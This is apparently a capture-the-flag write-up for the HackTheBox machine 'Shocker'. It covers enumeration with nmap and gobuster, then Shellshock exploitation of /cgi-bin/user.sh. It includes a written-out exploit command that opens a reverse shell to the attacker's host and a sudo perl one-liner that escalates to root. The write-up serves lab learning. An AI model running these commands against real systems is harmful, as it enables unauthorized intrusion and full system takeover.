1. Executive Summary
Shocker is Linux based machine that suffers from the infamous shellshock. According to this website, Shellshock is a vulnerability that can be used to execute commands with greater privileges on systems that contain a vulnerable version of Bash. As a result, attackers may be able to seize control of the system.
2. Description
2.1 Enumeration
Start with nmap, I used nmap command with -T4 for fast and aggressive scan, -A for OS detection, version detection, and script default scanning, -v for verbose, and -oA for saving the scan result on .XML, .nmap, and .gnmap format.
According to the scan result, there are two open ports. I tried to check if there is hidden directory under port 80.
There is /cgi-bin between the directory found in the last gobuster. Of course I don’t have any permission to access it, so I checked with gobuster if /cgi-bin is really exist using command below.
gobuster dir -u http://10.10.10.56/cgi-bin/ -w /root/Documents/SecLists/Discovery/Web-Content/common.txt -t 100 — timeout 100s -k — no-error -x .php,.html,.sh,.cgi,.txt
And yes it exists.
So I tried to look the possible vulnerability in cgi-bin in google and found this amazing website. According to that page I need to re-check with nmap using command below.
nmap 10.10.10.56 -p 80 — script=http-shellshock — script-args uri=/cgi-bin/user.sh
2.2 Exploitation
Now it is positive that the machine is vulnerable to shellshock. According to this website, Shellshock is a security bug in the Bash shell (GNU Bash up to version 4.3) that causes Bash to execute unintentional bash commands from environment variables. Threat actors exploiting the vulnerability can issue commands remotely on the target host. While Bash is not inherently Internet-facing, many internal and external services such as web servers do use environment variables to communicate with the server’s operating system.
I tried to look for the exploit using “searchsploit shellshock cgi”.
I copied the script into my local machine and later run the exploit using the command below.
python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.16.8 lport=2221 pages=/cgi-bin/user.sh
Quick reminder that you don’t have to create listener on this step because the shell is opened by itself. I know this because I start my listener and it said the port is already used :)
I used the command below to locate user.txt. The flag actually is under /home/shelly.
Root flag left! I tried to check shelly permission by using sudo -l.
According to this page, I can escalate the privilege using this command
sudo perl -e ‘exec “/bin/bash”;’
After successfully escalating the privilege from shelly to root, I decided to locate the root flag.
Using the same command when locating the user flag. I am able to obtain the root flag.
Locate the root.txt → find / -name root.txt -print 2>/dev/null
